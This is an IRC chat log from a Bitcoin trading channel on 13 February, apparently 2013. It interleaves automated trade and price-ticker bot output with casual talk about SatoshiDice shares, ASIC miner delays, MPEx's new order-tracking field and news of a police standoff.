Feb 13 14:54:30 [BTCTC] [BASIC-MINING] 2 @ 0.35 = 0.7 BTC [+] Feb 13 14:56:04 !ticker h sdice Feb 13 14:56:06 [HAVELOCK:SDICE] 1D: 0.71000000 / 0.73926695 / 0.75449000 (138 shares, 102.01883973 BTC), 7D: 0.60000000 / 0.64230514 / 0.76500000 (4515 shares, 2900.00772552 BTC), 30D: 0.44000000 / 0.64311671 / 0.89000000 (10784 shares, 6935.37056152 BTC) Feb 13 14:56:18 !ticker bf sdice Feb 13 14:56:19 Some are born to endless night. Feb 13 14:56:24 !ticker btct sdice Feb 13 14:56:26 Things which are alike, in nature, grow to look alike, and the speaking stones have lain a long time lookin' at the sun. Feb 13 14:56:33 !ticker btct gsdpt Feb 13 14:56:35 [BTCT:GSDPT] 1D: 0.006 / 0.0062 / 0.00625 (1444 shares, 9.0 BTC), 7D: 0.0052 / 0.01 / 0.0064 (61684 shares, 379.2 BTC), 30D: 0.0044 / 0.01 / 0.0082 (182124 shares, 1141.4 BTC) Feb 13 14:56:42 bejesus this shit's confusing Feb 13 14:58:44 [MPEX] [S.DICE] 2500 @ 0.00609358 = 15.234 BTC [-] Feb 13 14:58:46 [MPEX] [S.DICE] 2000 @ 0.00618365 = 12.3673 BTC [+] Feb 13 15:06:05 I don't get how when you're on the mtgox home page it shows Last Prices that are higher than what clarkmoody shows, i'd check the goxlive chart but it doesnt load Feb 13 15:06:15 i saw several $26+ last prices Feb 13 15:07:00 that's the secret options trading on mt gox Feb 13 15:07:04 for the big players Feb 13 15:07:25 meh, i cant sleep Feb 13 15:07:33 them bitcoins Feb 13 15:08:03 indeed Feb 13 15:08:26 dat spreaaaad Feb 13 15:09:30 s.dice volume being so low Feb 13 15:09:38 bet volume, i mean. Feb 13 15:10:01 as soon as james get back i know havelock will tank Feb 13 15:10:11 yes we need a whale Feb 13 15:10:43 i wonder what the purpose of those flags in satoshidice website Feb 13 15:10:59 !ticker m s.dice Feb 13 15:11:01 [MPEX:S.DICE] 1D: 0.00599414 / 0.00622848 / 0.0064 (56150 shares, 349.73 BTC), 7D: 0.004321 / 0.00624319 / 0.00677999 (2386061 shares, 14,896.66 BTC), 30D: 0.00085848 / 0.00559687 / 0.0075 (8232109 shares, 46,074.13 BTC) Feb 13 15:11:15 methinks eric should translate the website to chinese people Feb 13 15:11:37 they have some serious purchasing power.. they make the houses here so exp Feb 13 15:11:48 may as well make s.dice more exp Feb 13 15:12:00 its been there for quite a while now Feb 13 15:13:15 we start a collect for a bounty ? Feb 13 15:13:56 and ask for translation on chinese part of btctalk Feb 13 15:14:24 EV+ for each share holder ! Feb 13 15:15:48 [BTCTC] [BASIC-MINING] 3 @ 0.35 = 1.05 BTC [+] Feb 13 15:15:59 just hire this satoshi dice expert Feb 13 15:16:12 guaranteed wins Feb 13 15:16:22 i send 10btc to him Feb 13 15:16:31 i have to wait 24h he say Feb 13 15:18:48 seems legit with 21 post Feb 13 15:18:50 [BTCTC] [PAJKA.BOND] 1 @ 0.1 BTC [+] Feb 13 15:19:29 [BTCTC] [BTC-BOND] 8 @ 0.01 = 0.08 BTC [+] Feb 13 15:25:07 1 BTC = 25.46003 U.S. dollars = 18.8970756 Euros Feb 13 15:28:12 https://bitcointalk.org/index.php?topic=143766.msg1524078#msg1524078 Feb 13 15:28:24 Yeap, I can't wait to send this person 200 BTC Feb 13 15:30:00 Is there any plans for S.DICE to expand? Add more games? anything of the sort? Feb 13 15:33:14 [MPEX] [S.MPOE] 1700 @ 0.00064861 = 1.1026 BTC [-] Feb 13 15:34:43 says clay mugs workshop asset expert. Feb 13 15:39:04 Pucilowski unlikely i'd guess Feb 13 15:42:21 we just need whales to play Feb 13 15:45:08 maybe they want higher stakes Feb 13 15:45:23 http://www.bbc.co.uk/news/business-21439945 Feb 13 15:46:26 eu should demand IP laws concessions from us Feb 13 15:46:34 i suspect it went other way instead Feb 13 15:46:37 http://images4.fanpop.com/image/photos/16100000/-cats-16140154-1920-1080.jpg Feb 13 15:47:16 [MPEX] [S.MPOE] 4321 @ 0.00065669 = 2.8376 BTC [+] Feb 13 15:47:18 [MPEX] [S.MPOE] 1078 @ 0.00065666 = 0.7079 BTC [-] Feb 13 15:50:24 i got an email from avalon saying they'll re open 300 more ASICS Feb 13 15:50:25 for batch 2 Feb 13 15:50:46 lol Feb 13 15:50:54 what? Feb 13 15:50:58 for realz? Feb 13 15:51:08 forget i said anything. no im trolling Feb 13 15:51:59 now it could be a gamble, though im pretty sure bfl still has their heads up their asses Feb 13 15:54:29 "So it's looking like the week of the 17th for shipping, probably a bit later in the week unless the bumping house really pulls it together, we might be able to ship as early at the 18th, but that is pretty optimistic, more likely is around the 22nd or so." Feb 13 15:54:46 that's like a week old by now neh ? Feb 13 15:56:08 " The chips have been delivered by FedEx to the bumping facility. We will hopefully hear from the bumping facility tonight or tomorrow with regards to them, but I do not expect any movement on it until the 14th at the earliest. But... they were here and waiting, so the biggest hurdle in terms of delivery has been achieved." Feb 13 15:56:36 it seems to me he keeps saying, okay, 2 weeks from now Feb 13 15:56:43 2 weeks passes, okay 1 week from now Feb 13 15:56:49 then 3.5 days from now Feb 13 15:56:55 [MPEX] [S.MPOE] 11100 @ 0.00065782 = 7.3018 BTC [+] Feb 13 15:56:57 [MPEX] [S.MPOE] 27630 @ 0.00065941 = 18.2195 BTC [+] Feb 13 15:57:13 following an arithmetic sequence Feb 13 15:58:22 actually its geometric lol Feb 13 15:58:25 you need to dig deeper Feb 13 15:58:30 it's been delayed for ~3-4 months by now Feb 13 15:58:36 so more like a harmonic Feb 13 15:58:43 ah Feb 13 15:58:44 ll Feb 13 15:58:46 lol Feb 13 15:58:48 4 weeks 2 weeks 1 week 2 weeks 4 weeks 2 weeks etc Feb 13 15:59:50 anyway it's a pity nobody really cares, this entire asic stuff could have been such a birthing spawnpool of memes Feb 13 15:59:56 "HURDLE HAS BEEN ACHIEVED!" Feb 13 16:01:15 "quagmire achieved" already on much larger scale Feb 13 16:02:00 hey, did that bash.org you submitted ever get approved ? what was it ? Feb 13 16:02:33 dunno, it's few months already...it was about someone becoming your intern Feb 13 16:03:47 and i don't believe in mass asics deployment...unless they feature one on fox news :D Feb 13 16:04:24 i'll believe it when i see output move Feb 13 16:04:44 Network total 24.620 Thash/s. what asics ? Feb 13 16:05:00 supposedly avalon has been shipping for what, 2 weeks now ? Feb 13 16:05:03 where's the asics ? Feb 13 16:07:43 there a single user with 1 terahash of power Feb 13 16:07:53 mining at btc guild Feb 13 16:08:45 http://i.imgur.com/xGSYf1C.png Feb 13 16:08:50 them asics! Feb 13 16:09:49 you can represent your power coming from 100 units as a single unit and vice-versa if you so please. Feb 13 16:10:26 also, the person running btc guild said it was a website error Feb 13 16:10:36 [MPEX] [S.MPOE] 12295 @ 0.00065666 = 8.0736 BTC [-] Feb 13 16:10:38 [MPEX] [S.MPOE] 5575 @ 0.00064827 = 3.6141 BTC [-] Feb 13 16:11:24 btcguild charges 5% Feb 13 16:11:51 i wouldnt pick them Feb 13 16:15:58 pigeons: who would you use for a measly 670Mh/s? Feb 13 16:16:41 fuck asics. lets solve blocks by hand Feb 13 16:17:06 gimme a piece of paper, i'll write hashes manually Feb 13 16:18:14 TomServo: i dunno man Feb 13 16:18:26 try em all Feb 13 16:22:08 so just to be sure im doing this correctly Feb 13 16:22:10 724f039942614e8f442490260edd2535b8f6728133ef0ce7f705ae87b2495e94 Feb 13 16:22:32 i need to write a fuckton of these right? Feb 13 16:23:12 66 million of these strings per second to match an asic, right? Feb 13 16:24:08 waka waka Feb 13 16:24:29 wait Feb 13 16:24:33 billion Feb 13 16:24:36 mircea_popescu another desync or it's just me? Feb 13 16:24:38 inot million Feb 13 16:24:55 so 66 billion of those per sec Feb 13 16:24:55 jurov not desync, upgrade. Feb 13 16:24:57 back soon. Feb 13 16:25:24 challenge accepted Feb 13 16:25:29 ill write em by hand. brb Feb 13 16:25:32 hold my beer Feb 13 16:25:36 i like that, bareback monkey upgrades Feb 13 16:26:17 just hold it it wont take long Feb 13 16:28:29 jurov back. Feb 13 16:29:22 lol so i accidentally picked best time to pay referrals.. no mpex activity Feb 13 16:29:44 [MPEX] [S.MPOE] 4321 @ 0.00065906 = 2.8478 BTC [+] Feb 13 16:29:46 [MPEX] [S.MPOE] 7179 @ 0.00065941 = 4.7339 BTC [+] Feb 13 16:31:36 [MPEX] [S.MPOE] 10 @ 0.00065941 = 0.0066 BTC [+] Feb 13 16:32:27 [BTCTC] [BASIC-MINING] 10 @ 0.35 = 3.5 BTC [+] Feb 13 16:37:47 [MPEX] [S.MPOE] 10 @ 0.00065941 = 0.0066 BTC [+] Feb 13 16:40:43 jurov you'll be happy tho. look at a statjson. Feb 13 16:41:38 [MPEX] [S.MPOE] 2621 @ 0.00064831 = 1.6992 BTC [-] Feb 13 16:41:44 [MPEX] [S.MPOE] 10879 @ 0.00064827 = 7.0525 BTC [-] Feb 13 16:42:52 looks...can't discern anything new...looks into other account... Feb 13 16:43:28 o srsly ? Feb 13 16:43:38 look a little closer ? Feb 13 16:43:48 under trade history. Feb 13 16:44:08 "TradeHistory":[{"1360766495":{"MPSIC":"S.MPOE", "Track":"MPEx", "BS":"B", "Quantity":"2621", "Price":"64831"}} Feb 13 16:44:11 Track? Feb 13 16:44:46 that will populate with the first 4 chars of the md5 of the order. Feb 13 16:45:17 nice \o/ Feb 13 16:45:42 [MPEX] [S.MPOE] 4321 @ 0.00064848 = 2.8021 BTC [+] Feb 13 16:45:44 [MPEX] [S.MPOE] 12109 @ 0.00064827 = 7.8499 BTC [-] Feb 13 16:45:45 [MPEX] [S.MPOE] 5700 @ 0.00064783 = 3.6926 BTC [-] Feb 13 16:45:47 [MPEX] [S.MPOE] 7470 @ 0.00064609 = 4.8263 BTC [-] Feb 13 16:45:58 the first acct had empty trade history, that's why Feb 13 16:46:40 ah Feb 13 16:46:52 so from now on, if you keep a db of the md5 of the orders you send Feb 13 16:46:58 you can compare executions and sort them out. Feb 13 16:48:00 and if the order is not in your list you know your book got hit. Feb 13 16:48:29 yes. just curious, why md5? it's both slower and less safe than sha Feb 13 16:48:46 i think it's actually faster neh ? Feb 13 16:48:58 safety is hardly a concern, what diff would it make ? Feb 13 16:49:34 ;;google md5 sha1 speed Feb 13 16:49:34 cryptography - Is calculating an MD5 hash less CPU intensive than ...: ; Journal of Omnifarious - Myth: MD5 is faster than SHA-1: ; Re: MD5 vs. SHA-1, Performance & Pedigree: (1 more message) Feb 13 16:50:04 MD5 411 Feb 13 16:50:04 SHA-1 218 Feb 13 16:50:04 SHA-256 118 Feb 13 16:50:04 SHA-512 46 Feb 13 16:50:05 mb/s Feb 13 16:50:16 possibly sha-1 is faster for large-ish files Feb 13 16:50:57 anyway for this simple use case it's moot Feb 13 16:51:07 not a big difference Feb 13 16:52:55 ya for that matter could have just added all the bits together lol Feb 13 16:53:32 anyway, it was funny cause i deliberately didn't say anything to see if the ~5 minute downtime window would be noticed at all. Feb 13 16:53:42 guess what, it was noticed within 10 seconds Feb 13 16:54:32 hehe just cause i happened to do stuff and noticed it's waiting for an order Feb 13 16:56:16 hm, that order from 14:14 UTC is still waiting Feb 13 17:03:11 ;;bc,convert eur Feb 13 17:03:11 1 BTC = 26.10720 U.S. dollars = 19.3774215 Euros Feb 13 17:08:22 26? Feb 13 17:08:27 ;;ticker Feb 13 17:08:27 BTCUSD ticker | Best bid: 26.00000, Best ask: 26.13499, Bid-ask spread: 0.13499, Last trade: 26.13500, 24 hour volume: 73652.58496085, 24 hour low: 24.40000, 24 hour high: 26.13500, 24 hour vwap: 25.33009 Feb 13 17:08:33 yup Feb 13 17:25:35 [MPEX] [S.DICE] 10 @ 0.00618364 = 0.0618 BTC [-] Feb 13 17:25:46 big order there Feb 13 17:26:31 no worries, i can handle it. Feb 13 17:27:22 lol Feb 13 17:29:24 lol.. we're just testing this new track gizmo Feb 13 17:32:59 [MPEX] [S.DICE] 10 @ 0.00618364 = 0.0618 BTC [-] Feb 13 17:35:44 [BTCTC] [GOLD] 1 @ 0.65 BTC [-] Feb 13 17:45:54 [MPEX] [S.DICE] 9 @ 0.00618364 = 0.0557 BTC [-] Feb 13 17:47:54 [MPEX] [S.DICE] 8 @ 0.00618364 = 0.0495 BTC [-] Feb 13 17:52:57 mircea are you here? Feb 13 17:53:15 just learned that nomura is using pgp Feb 13 17:53:28 think soon everyone will be doing things like mpex Feb 13 17:53:39 since it is so much obviously better Feb 13 17:54:07 unless they do it like my bank... sends emails with pgp signature.. but pubkey is nowhere to be found Feb 13 17:54:13 scumbags Feb 13 17:56:18 i am here. Feb 13 17:56:47 mjr_ and of course they will. there's no other way. Feb 13 18:07:46 S.dice profit look good with the BTC rise . 7K profit is like 14K last month... Feb 13 18:13:00 [BTCTC] [COGNITIVE] 1 @ 0.3399 BTC [-] Feb 13 18:13:34 that's a point Feb 13 18:15:21 yea Feb 13 18:15:32 a handy excuse with souch deflationary currency Feb 13 18:15:37 such Feb 13 18:20:29 that's a point Feb 13 18:21:25 26.30 Feb 13 18:22:46 [BTCTC] [BTC-BOND] 2 @ 0.0099 = 0.0198 BTC [-] Feb 13 18:23:45 ;;bc,convert eur Feb 13 18:23:45 1 BTC = 25.96000 U.S. dollars = 19.268166 Euros Feb 13 18:23:48 ;;bc,stats Feb 13 18:24:00 Current Blocks: 220990 | Current Difficulty: 3275464.586565617 | Next Difficulty At Block: 221759 | Next Difficulty In: 769 blocks | Next Difficulty In About: 4 days, 19 hours, 21 minutes, and 0 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None Feb 13 18:29:00 is XRP / BTC going up or down? Feb 13 18:30:15 where does one even get XRP? Feb 13 18:30:28 I see 1000xrp for .6 btc on bitmit Feb 13 18:59:53 [BTCTC] [B.YABMC] 100 @ 0.02 = 2 BTC [-] Feb 13 18:59:55 [BTCTC] [B.YABMC] 15 @ 0.02 = 0.3 BTC [-] Feb 13 19:02:48 and the mpex upgrade announcement http://trilema.com/2013/mpex-improved-order-tracking/ Feb 13 19:03:40 added more duct tape? Feb 13 19:03:46 mhm. Feb 13 19:03:52 or more hamsters to the wheels Feb 13 19:05:06 duct tape save africa, could save mpex Feb 13 19:08:14 what hamsters? already was said that behind the racks there are female slaves concealed (with PhD in accounting, i guess) Feb 13 19:12:53 acuntin'. Feb 13 19:13:46 track value shown in pimpex nao: https://github.com/jurov/pyMPEx Feb 13 19:14:16 a good idea! Feb 13 19:14:35 https://bitcointalk.org/index.php?topic=143810.msg1524703#msg1524703 Feb 13 19:15:26 print 'Track: ' + md5d[0:4] + "\n" Feb 13 19:15:28 gotta love py Feb 13 19:15:48 lol kakobrekla Feb 13 19:15:57 [MPEX] [S.DICE] 963 @ 0.00618364 = 5.9548 BTC [-] Feb 13 19:15:59 [MPEX] [S.DICE] 390 @ 0.00618365 = 2.4116 BTC [+] Feb 13 19:16:01 [MPEX] [S.DICE] 250 @ 0.0061999 = 1.55 BTC [+] Feb 13 19:20:22 [MPEX] [S.DICE] 700 @ 0.0062 = 4.34 BTC [+] Feb 13 19:20:46 "It is quite common that during IPO most of the funds come from people You know. Only maybe 5%-10% are from private people that just react to the public offer." Feb 13 19:20:56 these people... Feb 13 19:22:46 lol sometimes it happens... when i launched MPBPT that was memorable Feb 13 19:23:10 fabianb asked "do you have enough to buy a bond? i consider investing" Feb 13 19:23:12 http://www.btcguild.com/halloffame.php Feb 13 19:23:21 that guy got 23mn shares Feb 13 19:23:24 me "yeah, i can add my own btcs, no prob" Feb 13 19:23:33 fabianb "nevermind then" Feb 13 19:23:39 i was like O.o Feb 13 19:24:15 the guy has never been involved with an ipo at all, either here or there. yet he comments on what "is common". Feb 13 19:24:25 obviously the forum sperg laps it up, but still. Feb 13 19:24:39 [MPEX] [S.MPOE] 4321 @ 0.0006566 = 2.8372 BTC [+] Feb 13 19:24:40 [MPEX] [S.MPOE] 12500 @ 0.00065683 = 8.2104 BTC [+] Feb 13 19:24:51 this "everything is equal to everything else" mentality is probably the #1 most obnoxious thing about bitcoin. Feb 13 19:25:27 [MPEX] [S.DICE] 1000 @ 0.00625 = 6.25 BTC [+] Feb 13 19:25:31 jurov: was that my wording? Feb 13 19:26:09 something like that Feb 13 19:27:09 yeah, i invested 20 btc and at that point not many more ppl bought mpbpt Feb 13 19:27:25 i was curious if you fill the gap to 100 Feb 13 19:27:45 yes in kow and thanks. but at that moment it was like wtf Feb 13 19:27:55 *i know and thanks Feb 13 19:29:58 well, i just wanted to know if you alternatively thought about just buying back shares instead Feb 13 19:30:37 well, if i got less than 50btc.. that would be hard decision Feb 13 19:31:01 it's not a matter of how much you got; but how much you wanted to put yourself into Feb 13 19:31:41 but yeah, i guessed the answer, but i thought asking doesn't cost me anything Feb 13 19:32:47 oh no problem sorry if you feel defamed a bit Feb 13 19:33:08 i should have anonymized that... it was just hilarious misunderstanding Feb 13 19:34:04 [MPEX] [S.MPOE] 6600 @ 0.00065921 = 4.3508 BTC [+] Feb 13 19:34:35 brb Feb 13 19:35:37 [MPEX] [S.DICE] 2080 @ 0.00622 = 12.9376 BTC [-] Feb 13 19:35:39 [MPEX] [S.DICE] 16897 @ 0.0062 = 104.7614 BTC [-] Feb 13 19:38:36 [MPEX] [S.MPOE] 1479 @ 0.00065921 = 0.975 BTC [+] Feb 13 19:38:38 [MPEX] [S.MPOE] 4321 @ 0.00065105 = 2.8132 BTC [-] Feb 13 19:38:39 [MPEX] [S.MPOE] 18100 @ 0.00065102 = 11.7835 BTC [-] Feb 13 19:38:40 [MPEX] [S.MPOE] 3916 @ 0.00064609 = 2.5301 BTC [-] Feb 13 19:41:04 8 days later it found enhancments Feb 13 19:41:04 http://shrani.si/f/2n/hg/pts7hyK/critbtc.png Feb 13 19:41:30 majorish change on green line around 75 :> Feb 13 19:42:07 lol 75 ?! Feb 13 19:42:26 difficulty change 75 Feb 13 19:42:50 on the x Feb 13 19:50:32 seems like every ~25 difficulties shit happens. Feb 13 19:50:44 good shit. Feb 13 19:53:40 [MPEX] [S.MPOE] 4321 @ 0.00065924 = 2.8486 BTC [+] Feb 13 19:53:42 [MPEX] [S.MPOE] 1530 @ 0.0006594 = 1.0089 BTC [+] Feb 13 19:53:44 [MPEX] [S.MPOE] 5373 @ 0.0006594 = 3.543 BTC [+] Feb 13 19:53:46 [MPEX] [S.MPOE] 9768 @ 0.00065941 = 6.4411 BTC [+] Feb 13 19:53:52 http://mpex.ir/ lol Feb 13 19:54:19 infra red. Feb 13 19:58:48 http://polimedia.us/dtng/c/src/136076188384.png Feb 13 19:58:50 that is pretty good Feb 13 19:58:53 (no porno) Feb 13 20:00:02 lol Feb 13 20:00:34 it gets cut at 'UFO' Feb 13 20:00:39 now im left confused Feb 13 20:04:27 [MPEX] [S.MPOE] 4321 @ 0.00064639 = 2.7931 BTC [-] Feb 13 20:04:29 [MPEX] [S.MPOE] 2359 @ 0.00064609 = 1.5241 BTC [-] Feb 13 20:13:00 [HAVELOCK] [SDICE] 3 @ 0.710101 = 2.1303 BTC [+] Feb 13 20:43:09 >overall americans are carrying a grand total of 798 billion in credit card debt. if you were alive when jesus was born and you spent a million dollars every singla day since then, you still would not have spent 798 billion by now. Feb 13 20:43:10 lol Feb 13 20:49:11 [MPEX] [S.MPOE] 4321 @ 0.00064621 = 2.7923 BTC [+] Feb 13 20:49:14 [MPEX] [S.MPOE] 12434 @ 0.00064609 = 8.0335 BTC [-] Feb 13 20:49:16 [MPEX] [S.MPOE] 868 @ 0.00064519 = 0.56 BTC [-] Feb 13 20:50:57 that's how much per head, including newborns? Feb 13 20:51:10 ;;calc 798e9/300e6 Feb 13 20:51:11 Error: invalid syntax (, line 1) Feb 13 20:51:16 ;;calc 798e9 / 300e6 Feb 13 20:51:16 Error: invalid syntax (, line 1) Feb 13 20:51:36 ;;calc 798.0e9 / 300.0e6 Feb 13 20:51:36 Error: invalid syntax (, line 1) Feb 13 20:51:52 jurov a coupla thousand. Feb 13 20:52:20 yeah.but now i'm obsessed to find out how to do it right Feb 13 20:53:16 [MPEX] [S.MPOE] 4321 @ 0.00064545 = 2.789 BTC [+] Feb 13 20:53:17 [MPEX] [S.MPOE] 13574 @ 0.00064519 = 8.7578 BTC [-] Feb 13 20:54:24 ;;calc 800000000000/300000000 Feb 13 20:54:25 2666.66666667 Feb 13 20:55:51 btw, i'm "shorting" euros similarly Feb 13 21:00:50 i'm going to issue colored coins in a bridge Feb 13 21:05:48 truffles, why? Feb 13 21:06:58 cause he got inficted by my obsession. poor fellow Feb 13 21:07:20 *infected Feb 13 21:08:28 what do you mean? Feb 13 21:08:44 ITS INCORRECT BECAUSE mod6 USES ZEROS! WHAT A QUEER! Feb 13 21:09:14 that's not queer. that's plain cheating Feb 13 21:09:19 haha Feb 13 21:09:21 BRAAAAAINS Feb 13 21:09:43 ;;help calc Feb 13 21:09:43 (calc ) -- Returns the value of the evaluated . The syntax is Python syntax; the type of arithmetic is floating point. Floating point arithmetic is used in order to prevent a user from being able to crash to the bot with something like '10**10**10**10'. One consequence is that large values such as '10**24' might not be exact. Feb 13 21:11:09 oh that tango. i've had a basic dance course but forgot long ago Feb 13 21:12:31 ;;calc 798*10**9/300*10**6 Feb 13 21:12:31 2660000000000000 Feb 13 21:12:37 yipes Feb 13 21:12:57 aims silver-bulleted gun Feb 13 21:13:06 oh that's for vampires instead Feb 13 21:15:24 didn't you miss a door? you should talk to daniel^2 in #bitcoin-otc Feb 13 21:15:38 if you want something queer Feb 13 21:16:24 fuuuuuuuuuuuuuuuuuu Feb 13 21:16:31 true. i do hate myself sometimes Feb 13 21:17:35 but well managed hate is the basic fundation of good relationshiip Feb 13 21:18:29 why? you shouldn't get too cozy with yourself :D Feb 13 21:20:29 This year DEF CON 21 will be $180, instead of $200 like last year,... Feb 13 21:20:39 I wonder if DT will take BTC this year... Feb 13 21:21:39 i hope they have enough forethought to book a convention area large enough for the number of attendies Feb 13 21:21:55 yeah, it seems to be a problem every year. Feb 13 21:22:26 I liked the Alexis park -- the pool and beer was never very far away. Feb 13 21:22:30 :D Feb 13 21:22:40 yeah, but everything else in vegas was :/ Feb 13 21:22:58 except maybe the hard rock Feb 13 21:23:00 [HAVELOCK] [SDICE] 2 @ 0.738 = 1.476 BTC [+] Feb 13 21:23:14 haha. long live The Pink Taco Feb 13 21:23:18 haha Feb 13 21:24:51 ;;ticker Feb 13 21:24:51 BTCUSD ticker | Best bid: 25.42222, Best ask: 25.49990, Bid-ask spread: 0.07768, Last trade: 25.49990, 24 hour volume: 88534.85294652, 24 hour low: 24.40000, 24 hour high: 26.30000, 24 hour vwap: 25.47354 Feb 13 21:25:01 [MPEX] [S.MPOE] 4321 @ 0.00065923 = 2.8485 BTC [+] Feb 13 21:25:01 [MPEX] [S.MPOE] 679 @ 0.00065941 = 0.4477 BTC [+] Feb 13 21:26:10 [MPEX] [S.MPOE] 4321 @ 0.00064594 = 2.7911 BTC [-] Feb 13 21:26:12 [MPEX] [S.MPOE] 35771 @ 0.00064519 = 23.0791 BTC [-] Feb 13 21:26:13 [MPEX] [S.MPOE] 8300 @ 0.00064574 = 5.3596 BTC [+] Feb 13 21:27:13 pff so the LAPD just WACO'd that dude huh Feb 13 21:27:59 sounds like it Feb 13 21:28:16 inb4 not him Feb 13 21:28:31 oh man would that be a shit storm if it wasn't Feb 13 21:28:52 [BTCTC] [COGNITIVE] 1 @ 0.3399 BTC [-] Feb 13 21:29:03 [BTCTC] [COGNITIVE] 3 @ 0.34 = 1.02 BTC [+] Feb 13 21:29:38 [BTCTC] [BASIC-MINING] 4 @ 0.35 = 1.4 BTC [+] Feb 13 21:30:38 random crazy dude who lived there for 15+ years Feb 13 21:30:55 suddenly all da polis at his doorstep, like he heard on his ham radio from jesus Feb 13 21:31:02 [BTCTC] [BTC-BOND] 68 @ 0.01 = 0.68 BTC [+] Feb 13 21:31:05 opens fire, hilarity ensues Feb 13 21:31:39 lol @ ham radio from jesus Feb 13 21:31:43 srsly. what kind of police work is that anyway? where you just start shooting people instead of trying to make a positive ID and apprehend him so he can face the court system. Feb 13 21:32:06 [MPEX] [S.MPOE] 4321 @ 0.00065908 = 2.8479 BTC [+] Feb 13 21:32:06 well actually i lolled at the "cabin caught on fire" Feb 13 21:32:07 [MPEX] [S.MPOE] 18079 @ 0.00065941 = 11.9215 BTC [+] Feb 13 21:32:08 the LAPD just started like going buckwild and shooting people Feb 13 21:32:12 ya, im sure it was bad wiring Feb 13 21:32:18 lol yeah Feb 13 21:32:37 well yeah - that shit wasn't going to trial, might as well go in guns a blazin' Feb 13 21:33:09 yeah, I understand a guy barricaded... but what about that blue truck that they mag dumped on lol Feb 13 21:36:10 maybe Toyota has a Type IV package. Feb 13 21:37:26 I think they used incendiary tear gas canisters at Waco. This felt just like it. Feb 13 21:39:54 http://en.wikipedia.org/wiki/Waco_siege Feb 13 21:40:00 http://en.wikipedia.org/wiki/Oklahoma_City_bombing Feb 13 21:40:00 [HAVELOCK] [SDICE] 15 @ 0.725 = 10.875 BTC [-] Feb 13 21:40:56 wat Feb 13 21:41:15 it was not swept under anything. it was all over the news for like ever. Feb 13 21:41:44 well they were, and they executed McVeigh Feb 13 21:42:45 I guess it was like 18 years ago o_0 Feb 13 21:42:50 wtf Feb 13 21:43:13 lol Feb 13 21:43:21 damn near before Win95 Feb 13 21:43:50 and Waco was like during AOL 2.0 Feb 13 21:44:03 did you hear the audio of the cops saying "burn it down"? Feb 13 21:44:26 iz: yeah. that will come back to haunt them methinks... Feb 13 21:44:29 http://youtu.be/cNk-bV40XMc?t=17s Feb 13 21:47:50 haha, then the lady is like "Police officers undersandibly upset..." Feb 13 21:48:03 yeah, upset alright. "BURN THE MOTHERFUCKER" Feb 13 21:53:19 i wonder what the media's angle is. Feb 13 21:53:30 i know if i were a journalist i'd rag on the police till i dropped Feb 13 21:53:39 why are they trying to be all nice ? it's not paying anything. Feb 13 21:58:47 mircea_popescu: I would guess trying to avoid a repeat LA riot. Feb 13 21:59:04 why "? Feb 13 21:59:18 if you cause one you get more ratings. Feb 13 21:59:24 does the police pay you if you prevent one ? Feb 13 22:01:25 [MPEX] [S.MPOE] 4321 @ 0.00065933 = 2.849 BTC [-] Feb 13 22:01:27 [MPEX] [S.MPOE] 379 @ 0.00065941 = 0.2499 BTC [+] Feb 13 22:04:36 [MPEX] [S.MPOE] 3479 @ 0.00065941 = 2.2941 BTC [+] Feb 13 22:04:37 [MPEX] [S.MPOE] 4321 @ 0.00065925 = 2.8486 BTC [-] Feb 13 22:07:11 mircea_popescu: because the police allow them to be on the scene Feb 13 22:07:25 o yeah, Feb 13 22:07:31 if they don't cooperate, they get kicked off the scene, and competeing reporters that kiss more ass get the exclusive Feb 13 22:07:31 that'll go great, disallow them. how does that go ? Feb 13 22:07:36 ABC is now banned from scene ? Feb 13 22:07:52 fine. abc spends the next full week runningspecials about la police corruption Feb 13 22:07:59 asks people to call in with their stories Feb 13 22:08:02 airs them back to back. Feb 13 22:08:03 but there WAS press there Feb 13 22:08:04 guess what ? Feb 13 22:08:09 NBC and FOX were all over it Feb 13 22:08:25 i was just saying, random venue gets banned. Feb 13 22:08:25 ABC was just slow to get there and are being whiners Feb 13 22:08:28 who can afford this ? Feb 13 22:08:35 it's just one reporter there Feb 13 22:08:44 police always tell them to fuck off and they did Feb 13 22:08:44 i haven't been following the story at all, just picked a random letter sequence Feb 13 22:08:49 they told the press to stop recording Feb 13 22:08:50 which turns out to be an actual outlet o.o Feb 13 22:08:52 and to stop tweeting Feb 13 22:09:05 they actually told the press to stop tweeting about it Feb 13 22:09:21 ;;bc,24hprc Feb 13 22:09:22 25.47 Feb 13 22:10:09 why does gribble round the vwap? Feb 13 22:12:17 hm, looks like it uses "display_short" from mtgox ticker Feb 13 22:12:47 mircea_popescu, do you use rounded or full vwap for options? Feb 13 22:13:51 it's precisely 25.47181 now, not 25.47 Feb 13 22:14:16 ;;ticker Feb 13 22:14:16 BTCUSD ticker | Best bid: 25.62101, Best ask: 25.70000, Bid-ask spread: 0.07899, Last trade: 25.70000, 24 hour volume: 88419.83007404, 24 hour low: 24.40000, 24 hour high: 26.30000, 24 hour vwap: 25.47214 Feb 13 22:14:38 the value used is here http://bitcoincharts.com/markets/currencies/ Feb 13 22:15:35 they average all markets? Feb 13 22:16:05 yea Feb 13 22:17:12 hm, must redo it then Feb 13 22:17:51 hm ? Feb 13 22:18:08 users want understandable computation to be done automatically on exercise page... and one complained it isn't correct Feb 13 22:18:18 now i know why, used wrong ticker Feb 13 22:19:08 https://www.bitcoinasic.net/ awww they got pulled off the interwebs Feb 13 22:19:25 Where is the "specialized devision of a huge corporate electronics manufacturer in Canada" !!! Feb 13 22:19:38 jurov there's a json there too Feb 13 22:20:10 yes, i see. but there's also said "query only once per 15 minutes". quite lame. Feb 13 22:20:26 must set up caching etc. Feb 13 22:27:45 [MPEX] [S.MPOE] 1287 @ 0.00064519 = 0.8304 BTC [-] Feb 13 22:27:47 [MPEX] [S.MPOE] 4321 @ 0.00064387 = 2.7822 BTC [-] Feb 13 22:27:51 [MPEX] [S.MPOE] 17294 @ 0.00064386 = 11.1349 BTC [-] Feb 13 22:27:53 [MPEX] [S.MPOE] 25714 @ 0.00064378 = 16.5542 BTC [-] Feb 13 22:27:55 [MPEX] [S.MPOE] 11733 @ 0.000642 = 7.5326 BTC [-] Feb 13 22:27:56 [MPEX] [S.MPOE] 8500 @ 0.00064299 = 5.4654 BTC [+] Feb 13 22:29:46 [MPEX] [S.MPOE] 7950 @ 0.00064677 = 5.1418 BTC [+] Feb 13 22:32:55 anyone know how to get a google doc to reload a script? Feb 13 22:33:06 trying to make it automatically get the freshest mt. gox price Feb 13 22:33:37 it will do it every hour or so Feb 13 22:33:50 there is some code you can use to make it do it faster, but it didn't work for me Feb 